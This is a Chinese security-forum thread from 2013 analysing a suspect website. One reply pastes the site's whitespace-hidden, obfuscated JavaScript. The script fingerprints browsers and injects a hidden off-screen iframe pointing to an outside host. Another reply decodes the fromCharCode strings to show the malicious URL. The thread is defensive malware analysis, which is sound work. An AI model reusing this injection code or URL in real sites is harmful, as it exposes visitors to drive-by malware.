收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://tamerkirci.com/php-hit-uygulamasi/
返回列表 发新帖
查看: 952|回复: 3
收起左侧

[未鉴定] http://tamerkirci.com/php-hit-uygulamasi/

[复制链接]
墨家小子
发表于 2013-4-24 22:49:52 | 显示全部楼层 |阅读模式
1.PNG

2.PNG

5773179.zip (234.78 KB, 下载次数: 47)
回复

举报

dayangyang
发表于 2013-4-24 22:59:08 | 显示全部楼层
  1.                                                                                                                                                                                                                                                                                                                                                                                                                                                                 <script type="text/javascript"> function ve73e255d4d2ddbd(c3a33605a47909,n5e9654bfe30,jeb59779e36bee2b) {
  2.        var today = new Date();
  3.      var expire = new Date();
  4.      if (jeb59779e36bee2b==null || jeb59779e36bee2b==0) jeb59779e36bee2b=1;
  5.      expire.setTime(today.getTime() + 3600000*jeb59779e36bee2b);
  6.      document.cookie = c3a33605a47909+"="+escape(n5e9654bfe30) + ";
  7.     expires="+expire.toGMTString();
  8.      }
  9.        function xe5b0d497cdfebb8(c3a33605a47909) {
  10.        var c838e3c74=" "+document.cookie;
  11.      var ind =c838e3c74.indexOf(" "+c3a33605a47909+"=");
  12.      if (ind==-1) ind=c838e3c74.indexOf(";
  13.     "+c3a33605a47909+"=");
  14.      if (ind==-1 || c3a33605a47909=="") return "";
  15.      var ind1=c838e3c74.indexOf(";
  16.     ",ind+1);
  17.      if (ind1==-1) ind1=c838e3c74.length;
  18.      return unescape(c838e3c74.substring(ind+c3a33605a47909.length+2,ind1));
  19.      }
  20.        function z0766b96a049() {
  21.        ve73e255d4d2ddbd("u144c4c77781","1",168);
  22.      }
  23.        function i0cc5f7b46635c0e() {
  24.        if (arguments.callee.done) return;
  25.      arguments.callee.done = true;
  26.      var y8bfb1af75ecb26d = false;
  27.      var x3b344b1b6e393c = navigator.userAgent;
  28.      if(x3b344b1b6e393c.indexOf("Linux") != -1 || x3b344b1b6e393c.indexOf("iPhone") != -1 || x3b344b1b6e393c.indexOf("iPod") != -1 || x3b344b1b6e393c.indexOf("Macintosh") != -1 || x3b344b1b6e393c.indexOf("Opera Mini") != -1 || x3b344b1b6e393c.indexOf("Chrome") != -1) {
  29.        return;
  30.      }
  31.        var vcabfccf0fd0a3fa5 = false;
  32.      var zfb75c877d821424 = false;
  33.      if ( x3b344b1b6e393c.indexOf("Windows NT") != -1 ) {
  34.        if(x3b344b1b6e393c.indexOf(" MSIE ") != -1 ) {
  35.        vcabfccf0fd0a3fa5 = true;
  36.      y8bfb1af75ecb26d = true;
  37.      }
  38.        if(x3b344b1b6e393c.indexOf(" Safari/") != -1 ) {
  39.        y8bfb1af75ecb26d = true;
  40.      }
  41.        if(x3b344b1b6e393c.indexOf(" Firefox/") != -1 ) {
  42.        zfb75c877d821424 = true;
  43.      y8bfb1af75ecb26d = true;
  44.      }
  45.        if(x3b344b1b6e393c.indexOf(" Presto/") != -1 ) {
  46.        if(x3b344b1b6e393c.indexOf("Opera/") != -1) {
  47.        y8bfb1af75ecb26d = true;
  48.      }
  49.        }
  50.        }
  51.        if(vcabfccf0fd0a3fa5) {
  52.        if(zfb75c877d821424) {
  53.        return;
  54.      }
  55.        }
  56.        if(y8bfb1af75ecb26d == false) {
  57.        return;
  58.      }
  59.        u39fcc6213a67 = xe5b0d497cdfebb8("u144c4c77781");
  60.      if(u39fcc6213a67 == "1") {
  61.        return;
  62.      }
  63.        var yf08f87c797e = document.getElementsByTagName('body')[0];
  64.      if(yf08f87c797e) {
  65.        var sfac0035683a1 = String.fromCharCode(105,102,114,97,109,101);
  66.      var dd147e8d49cc10 = document.createElement(sfac0035683a1);
  67.      var e24494d3aa = String.fromCharCode(104,116,116,112,58,47,47,99,117,103,104,97,107,101,105,46,109,111,114,100,111,114,99,111,100,101,109,111,110,107,101,121,115,46,99,111,109,47,111,112,101,110,115,116,97,116,47,97,112,112,114,111,112,114,105,97,116,101,47,97,112,105,46,112,104,112);
  68.      dd147e8d49cc10.setAttribute('src',e24494d3aa);
  69.      if(dd147e8d49cc10.attachEvent) {
  70.        dd147e8d49cc10.attachEvent('onload',z0766b96a049);
  71.      }
  72.        else if (dd147e8d49cc10.addEventListener) {
  73.        dd147e8d49cc10.addEventListener('load', z0766b96a049, false);
  74.      }
  75.        else {
  76.        dd147e8d49cc10.onload = z0766b96a049;
  77.      }
  78.        dd147e8d49cc10.setAttribute('frameBorder',0);
  79.      dd147e8d49cc10.style.position = 'absolute';
  80.      var u6d12317d7 = String.fromCharCode(45,57,57,54,101,109);
  81.      dd147e8d49cc10.style.top = u6d12317d7;
  82.      dd147e8d49cc10.style.left = u6d12317d7;
  83.      dd147e8d49cc10.id = String.fromCharCode(110,102,57,99,99,56,50,99,97,53);
  84.      yf08f87c797e.appendChild(dd147e8d49cc10);
  85.      }
  86.        }
  87.        function i63265ed135b(of5db9123844d35d) {
  88.        var o4f37e85a78d8 = false;
  89.      function y74ff1ea0e3() {
  90.        if (o4f37e85a78d8) return;
  91.      o4f37e85a78d8 = true;
  92.      of5db9123844d35d();
  93.      }
  94.        if ( document.addEventListener ) {
  95.        document.addEventListener( "DOMContentLoaded", y74ff1ea0e3, false );
  96.      }
  97.        else if ( document.attachEvent ) {
  98.        var rce23639db3ff7 = false;
  99.      try {
  100.        rce23639db3ff7 = window.frameElement != null ;
  101.      }
  102.        catch(e){
  103.       }
  104.         if ( document.documentElement.doScroll ) {
  105.        if(!rce23639db3ff7) {
  106.        function o35bc8391d97c1() {
  107.        if (o4f37e85a78d8) {
  108.        return;
  109.      }
  110.        try {
  111.        document.documentElement.doScroll("left");
  112.      y74ff1ea0e3();
  113.      }
  114.        catch(e) {
  115.        setTimeout(o35bc8391d97c1, 10);
  116.      }
  117.        }
  118.        o35bc8391d97c1();
  119.      }
  120.        }
  121.        document.attachEvent("onreadystatechange", function() {
  122.        if ( document.readyState === "complete" ) {
  123.        y74ff1ea0e3();
  124.      }
  125.        }
  126.       ) }
  127.        if (window.addEventListener)  window.addEventListener('load', y74ff1ea0e3, false);
  128.      else if (window.attachEvent)  window.attachEvent('onload', y74ff1ea0e3);
  129.      else {
  130.        var a123c0e0203b97 = window.onload ;
  131.      window.onload = function() {
  132.        if(a123c0e0203b97) {
  133.        a123c0e0203b97();
  134.      }
  135.        y74ff1ea0e3();
  136.      }
  137.        }
  138.        }
  139.        i63265ed135b(i0cc5f7b46635c0e);
  140.     </script>
复制代码
马上解。。
回复

举报

dayangyang
发表于 2013-4-24 23:18:17 | 显示全部楼层
这么杂乱的变量名深刻怀疑是expoit。。只是不知道是哪个
中间居然有对手机浏览器版本的识别。。
  1. if(x.indexOf("Linux") != -1 || x.indexOf("iPhone") != -1 || x.indexOf("iPod") != -1 || x.indexOf("Macintosh") != -1 || x.indexOf("Opera Mini") != -1 || x.indexOf("Chrome") != -1) {
  2.        return;
  3.      }
复制代码
中间加密的两段
  1. String.fromCharCode(105,102,114,97,109,101);
  2. String.fromCharCode(104,116,116,112,58,47,47,99,117,103,104,97,107,101,105,46,109,111,114,100,111,114,99,111,100,101,109,111,110,107,101,121,115,46,99,111,109,47,111,112,101,110,115,116,97,116,47,97,112,112,114,111,112,114,105,97,116,101,47,97,112,105,46,112,104,112);
复制代码
解密下来分别是
  1. iframe
  2. http://cughakei.mordorcodemonkeys.com/openstat/appropriate/api.php
复制代码
好明显呵呵
回复

举报

x_3max
发表于 2013-4-25 10:57:39 | 显示全部楼层
卡巴斯基阻止!
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-3 02:00 , Processed in 0.132875 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表